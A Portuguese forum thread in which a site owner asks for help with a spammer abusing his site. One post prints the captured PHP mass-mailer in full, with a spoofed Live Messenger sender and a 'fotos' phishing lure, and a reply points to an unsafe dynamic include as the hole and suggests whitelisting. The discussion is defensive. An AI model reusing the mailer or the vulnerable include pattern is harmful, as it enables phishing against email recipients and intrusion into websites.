Spammer Insistente Usando Meu Site
#16
Posted 26/03/2008, 12:21
Cruzando as respostas, você encontrará o foco do problema.
Muller Dias
ex-administrador Fórum WMO
#17
Posted 09/03/2009, 17:10
Depois de muito tempo o xxxxxx voltou a atacar, eis os novos dados do safado.

O novo Código capturado é:
<?php
set_time_limit(0);
if($manda)
{
//EMAIL DO DESTINAT?RIO
$destinatario = "$remetente";
//ASSUNTO DO EMAIL
$assunto = "$assunto";
//MENSAGEM DO EMAIL
$mensagem = $html;
$mensagem = stripslashes($mensagem);
//CABE?ALHO DO EMAIL
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
/* headers adicionais */
$headers .= "From:<$remetente>\r\n";
$headers .= "Cc: $remetente\r\n";
$headers .= "Bcc: e$remetente\r\n";
//ARQUIVO COM OS EMAILS
$arquivo = $lista;
//LENDO ARQUIVO
$file = explode("\n", $arquivo);
$i = 1;
?><title>spamer priv thundercash</title>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<p> </p>
<?
if($manda) { ?>
<table width="59%" height="30" border="0" align="center" cellpadding="2" cellspacing="1" bgcolor="#333333">
<tr>
<td bgcolor="#f5f5f5">
<?
foreach ($file as $mail) {
if(mail($mail, $assunto, $mensagem, $headers))
echo "<font color=green face=verdana size=1>* $i - ".$mail."</font> <font color=green face=verdana size=1>uiauia</font><br>";
else
echo "* $i ".$email[$i]." <font color=red>Não foi!</font><br><hr>";
$i++;
}
}
?>
</td>
</tr>
</table><? } ?>
<form name="form1" method="post" action="">
<table width="47%" height="202" border="0" align="center" cellpadding="0" cellspacing="2" bgcolor="#666666">
<tr>
<td bgcolor="#FFFFFF"><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="3" bgcolor="#636666"> <div align="center"><font color="#FFFFFF" size="4" face="Verdana, Arial, Helvetica, sans-serif"><b>
</b></font></div></td>
</tr>
<tr>
<td width="21%"><div align="center"><font color="#4A03000"><b><font size="2" face="Verdana, Arial, Helvetica, sans-serif">ASSUNTO:</font></b></font></div></td>
<td width="1%" bgcolor="#616666"> </td>
<td width="78%">
<input name="assunto" type="text" id="assunto3" size="50" value="FOTOS"></td>
</tr>
<tr>
<td><div align="center"><font color="#4A033000"><b><font size="2" face="Verdana, Arial, Helvetica, sans-serif">REMETENTE:</font></b></font></div></td>
<td bgcolor="#66623666"> </td>
<td>
<input name="remetente" type="text" id="remetente3" value="notification@live-messenger.com" size="24"></td>
</tr>
<tr>
<td><div align="center"><font color="#4A10000"><b><font size="2" face="Verdana, Arial, Helvetica, sans-serif">CODIGO HTML:</font></b></font></div></td>
<td bgcolor="#6666366"> </td>
<td><textarea name="html" cols="30" rows="4" id="textarea2">
<html>
<head>
<p><font face=Arial size=3>Oie!!<br>
tudo bem? eu esqueci de mandar as fotos! agora ta ai!!<br>
Beijao!<br>
<p>anexo:
<p><font face=Arial size=3><a href="[ENDEREÇO REMOVIDO]">foto01.jpg (185kb)
<p><font face=Arial size=3><a href="[ENDEREÇO REMOVIDO]">foto02.jpg (183kb)
<p><font face=Arial size=3><a href="[ENDEREÇO REMOVIDO]">foto03.jpg (178kb)
</a></font></p>
</body>
</html>
</textarea></td>
</tr>
<tr>
<td><div align="center"><font color="#4A0000"><b><font size="2" face="Verdana, Arial, Helvetica, sans-serif">EMAILS:</font></b></font></div></td>
<td bgcolor="#6666266"> </td>
<td><textarea name="lista" cols="40" rows="10" id="textarea3"></textarea></td>
</tr>
<tr>
<td><div align="center"></div></td>
<td bgcolor="#6662666"> </td>
<td> </td>
</tr>
<tr>
<td> </td>
<td bgcolor="#6626666"> </td>
<td><div align="center">
<input name="manda" type="submit" id="manda" value="Send!">
</div></td>
</tr>
<tr>
<td height="23"> </td>
<td bgcolor="#6662666"> </td>
<td><div align="center"><font size="2" face="Verdana, Arial, Helvetica, sans-serif">
<b></b></font></div></td>
</tr>
</table></td>
</tr>
</table>
</form>O que leva para o seguinte formulário:

Olhei no DreamWeaver e o código gera o seguinte E-mail:

Alguém tem uma solução?
Edição feita por: '' sem.Ponto, 10/03/2009, 08:38.
#18
Posted 11/03/2009, 00:51
Daqui eu estou vendo a brecha que você deixou, o site está mal programado. O código para abertura das páginas internas do seu site deve estar mais ou menos assim:
$pagina = $_GET['pagina']; include $pagina;
Aí para abrir uma página interna, creio que o link fica assim: www.seusite.com.br/index.php?pagina=pagina.php
Estou certo?
Você tem que verificar o nome antes de liberar a include, senão fica muito inseguro.
Muller Dias
ex-administrador Fórum WMO
#19
Posted 12/03/2009, 10:34
O dream weaver realmente ajuda muita coisa, mas não deixe q ele faça todo o trabalho.
#20
Posted 12/03/2009, 10:37
Você tem que verificar o nome antes de liberar a include, senão fica muito inseguro.
Como eu faço isso?
#21
Posted 13/03/2009, 00:00
Você pode usar apenas condicional, switch, função in_array()...
Qualquer dúvida, poste em PHP.
Muller Dias
ex-administrador Fórum WMO
#22
Posted 13/03/2009, 14:31
Quer saber? Apaguei meu site e estou fazendo outro...

Esse primeiro verifiquei, o arquivo windows.txt
Existem várias formas de fazer isso...
Você pode usar apenas condicional, switch, função in_array()...
Qualquer dúvida, poste em PHP.
Agora que percebi uma parada, teu nick é sem.ponto e o site mencionado acima veio através do www.semponto.com.br, por um acaso era tu fazendo isso também?
#23
Posted 13/03/2009, 19:38
Todos esses aí eu era eu testando, o estranho é que eu não ví "includando" os arquivos.
Muller Dias
ex-administrador Fórum WMO
1 user(s) are reading this topic
0 membro(s), 1 visitante(s) e 0 membros anônimo(s)










